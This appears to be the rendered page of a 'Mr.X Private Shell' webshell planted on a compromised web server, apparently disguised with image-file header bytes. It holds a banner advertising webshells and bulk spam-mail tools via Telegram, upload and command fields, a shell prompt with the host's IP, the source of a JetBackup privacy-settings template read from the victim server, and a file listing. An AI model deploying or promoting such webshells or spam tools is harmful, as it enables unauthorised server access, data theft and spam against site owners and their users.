����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

antiaginglove@216.73.216.231: ~ $
<div ng-controller="privacySettings" class="controller-box">
    <div class="row">
        <div class="col-lg-8 col-lg-offset-2 col-md-12 col-md-offset-0">
            <div class='alert alert-warning'>
                <div class='alert-message'>
                    <strong class="alert-title" style="font-size: 20px;">{{lang.t("Server Master Encryption Key")}}</strong>
                    <div class="alert-body">
                        <p>{{ lang.t("JetBackup uses an encryption key to encrypt valuable data. This key will be required in DR situations as JB Config backup is encrypted. Please be advised, there is no way to restore from DR without this key, and it's important to keep this key in a secure location.") }}</p>
                        <p>{{ lang.t("Your Encryption Key:") }} <code>{{encryption_key}}</code></p>
                    </div>
                </div>
            </div>

            <div class="form-group">
                <label class="control-label col-md-3 col-sm-3 col-xs-12" for="user_agreement">{{ lang.t("User Agreement") }}</label>
                <div class="col-md-9 col-sm-9 col-xs-12">
                    <textarea id="user_agreement" class="form-control col-md-7 col-xs-12" style="min-height: 150px;" ng-model="saveData.user_agreement">{{saveData.user_agreement}}</textarea>
                    <p class="help-block">{{ lang.t("Displays your User Agreement to clients. Leave empty to not require approval. Please note that once you add/modify this agreement all accounts will be forced to approve it again.") }}</p>
                </div>
            </div>
            <div class="form-group">
                <label class="control-label col-md-3 col-sm-3 col-xs-12" for="privacy_policy">{{ lang.t("Privacy Policy") }}</label>
                <div class="col-md-9 col-sm-9 col-xs-12">
                    <textarea id="privacy_policy" class="form-control col-md-7 col-xs-12" style="min-height: 150px;" ng-model="saveData.privacy_policy">{{saveData.privacy_policy}}</textarea>
                    <p class="help-block">{{ lang.t("Displays your Privacy Policy to clients. Leave empty to not require approval. Please note that once you add/modify this agreement all accounts will be forced to approve it again.") }}</p>
                </div>
            </div>
            <div class="form-group">
                <label class="control-label col-md-3 col-sm-3 col-xs-12">{{ lang.t("Account Encryption Selection") }}</label>
                <div class="col-md-9 col-sm-9 col-xs-12">
                    <div class="pretty p-default p-round p-smooth">
                        <input aria-label="{{ lang.t('Radio button, Enable Account Encryption Selection, yes') }}" type="radio" ng-model="saveData.encryption_selection" id="encryption_selection_1" ng-checked="saveData.encryption_selection == 1" value="1" />
                        <div class="state p-primary"><label for="encryption_selection_1">{{ lang.t("Yes") }}</label></div>
                    </div>
                    <div class="pretty p-default p-round p-smooth">
                        <input aria-label="{{ lang.t('Radio button, Enable Account Encryption Selection, no') }}" type="radio" ng-model="saveData.encryption_selection" id="encryption_selection_0" ng-checked="saveData.encryption_selection == 0" value="0" />
                        <div class="state p-primary"><label for="encryption_selection_0">{{ lang.t("No") }}</label></div>
                    </div>
                    <p class="help-block">{{ lang.t("Give the clients the ability to choose whether they want to be backed up regularly, only on encrypted backup jobs or not be backed up at all. (GDPR Best Practice)") }}</p>
                </div>
            </div>
            <div class="form-group">
                <label class="control-label col-md-3 col-sm-3 col-xs-12" for="forgotten_ttl">{{ lang.t("The right to be forgotten") }}</label>
                <div class="col-md-9 col-sm-9 col-xs-12">
                    <input-dropdown prefix="{{lang.t('Delete account data after')}}" addon="{{lang.t('Days')}}" options="{0:lang.t('Disabled'),30:30,60:60,90:90,180:180}" ng-model="saveData.forgotten_ttl">
                        <input  validate-field="int" min="0" class="form-control" ng-model="saveData.forgotten_ttl" id="forgotten_ttl" type="text" value="" />
                    </input-dropdown>
                    <p class="help-block">{{ lang.t("Specify the number of days to keep account data upon TERMINATION, after which ALL DATA will be deleted (including backups, logs and etc...).") }}</p>
                </div>
            </div>

        </div>
    </div>

</div>

Filemanager

Name Type Size Permission Actions
binary.htm File 4.36 KB 0644
general.htm File 14.91 KB 0644
notification.htm File 5.87 KB 0644
notificationActions.htm File 1.09 KB 0644
notificationManage.htm File 6.93 KB 0644
performance.htm File 14.71 KB 0644
privacy.htm File 4.55 KB 0644
resource.htm File 3.96 KB 0644
restore.htm File 4.46 KB 0644
snapshots.htm File 3.56 KB 0644
update.htm File 1.42 KB 0644